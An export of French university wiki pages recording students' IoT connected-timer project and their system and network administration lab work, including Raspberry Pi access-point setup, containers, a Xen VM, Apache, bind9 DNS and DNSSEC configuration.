Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
===Séance 5===<br />
<br />
====Configuration de la raspberry pi====<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49385P4 IOT 20182019-01-20T20:21:52Z<p>Mcreteur : /* Contexte */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisée sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 4 afficheurs 7 segments<br />
* Une Raspberry pi 3<br />
* Des transistors PNP <br />
* Résistances<br />
* Multiplexeurs<br />
<br />
==Suivi de réalisation==<br />
<br />
===Séance 1===<br />
===Séance 2===<br />
===Séance 3===<br />
<br />
====Serveur web====<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
===Séance 4===<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
===Séance 5===<br />
<br />
====Configuration de la raspberry pi====<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49224P4 IOT 20182019-01-07T17:28:02Z<p>Mcreteur : Page créée avec « =Présentation du sujet = ==Contexte== ==Description du projet== =Réalisation= ==Matériel utilisé== ==Suivi de réalisation== »</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
<br />
==Description du projet==<br />
<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
<br />
==Suivi de réalisation==</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Option_Internet_des_objets_2018/2019&diff=49181Option Internet des objets 2018/20192019-01-07T15:13:13Z<p>Mcreteur : /* Répartition des binômes */</p>
<hr />
<div>= Répartition des binômes =<br />
<br />
Ecrivez vos noms sous le format exact "Prénom Nom", séparez vos noms par des virgules. Modifiez aussi l'intitulé de votre projet.<br />
<br />
{| class="wikitable"<br />
! Projet !! Elèves<br />
|-<br />
| [[P1_IOT_2018|Sujet 1]] || Raphael Morin, Brahim Ahammou<br />
|-<br />
| [[P2_IOT_2018|Smart Pen]] || Tony Jongmanee, Walid Ziyate<br />
|-<br />
| [[P3_IOT_2018|Sujet 3]] || Prénom Nom, Prénom Nom<br />
|-<br />
| [[P4_IOT_2018|Timer connecté]] || Naif Mehanna, Maxime Créteur, Amine El Messaoudi<br />
|-<br />
| [[P5_IOT_2018|Sujet 5]] || Prénom Nom, Prénom Nom<br />
|-<br />
| [[P6_IOT_2018|Sujet 6]] || Prénom Nom, Prénom Nom<br />
|-<br />
| [[P7_IOT_2018|Sujet 7]] || Prénom Nom, Prénom Nom<br />
|-<br />
|}</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Option_Internet_des_objets_2018/2019&diff=49175Option Internet des objets 2018/20192019-01-07T14:46:24Z<p>Mcreteur : /* Répartition des binômes */</p>
<hr />
<div>= Répartition des binômes =<br />
<br />
Ecrivez vos noms sous le format exact "Prénom Nom", séparez vos noms par des virgules. Modifiez aussi l'intitulé de votre projet.<br />
<br />
{| class="wikitable"<br />
! Projet !! Elèves<br />
|-<br />
| [[P1_IOT_2018|Sujet 1]] || Raphael Morin, Brahim Ahammou<br />
|-<br />
| [[P2_IOT_2018|Stylo connecté]] || Tony Jongmanee, Walid Ziyate<br />
|-<br />
| [[P3_IOT_2018|Sujet 3]] || Prénom Nom, Prénom Nom<br />
|-<br />
| [[P4_IOT_2018|Sujet 4]] || Naif Mehanna, Maxime Créteur<br />
|-<br />
| [[P5_IOT_2018|Sujet 5]] || Prénom Nom, Prénom Nom<br />
|-<br />
| [[P6_IOT_2018|Sujet 6]] || Prénom Nom, Prénom Nom<br />
|-<br />
| [[P7_IOT_2018|Sujet 7]] || Prénom Nom, Prénom Nom<br />
|-<br />
|}</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=49136TP sysres IMA5sc 2018/2019 G72018-12-21T18:11:16Z<p>Mcreteur : /* 6. Réalisation */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1200px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===4.2 Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves.<br />
<br />
<br />
===4.4 DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===4.3 Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
[[Fichier:Httpshercule.png|1000px|center]]<br />
<br />
===Serveur Freeradius===<br />
<br />
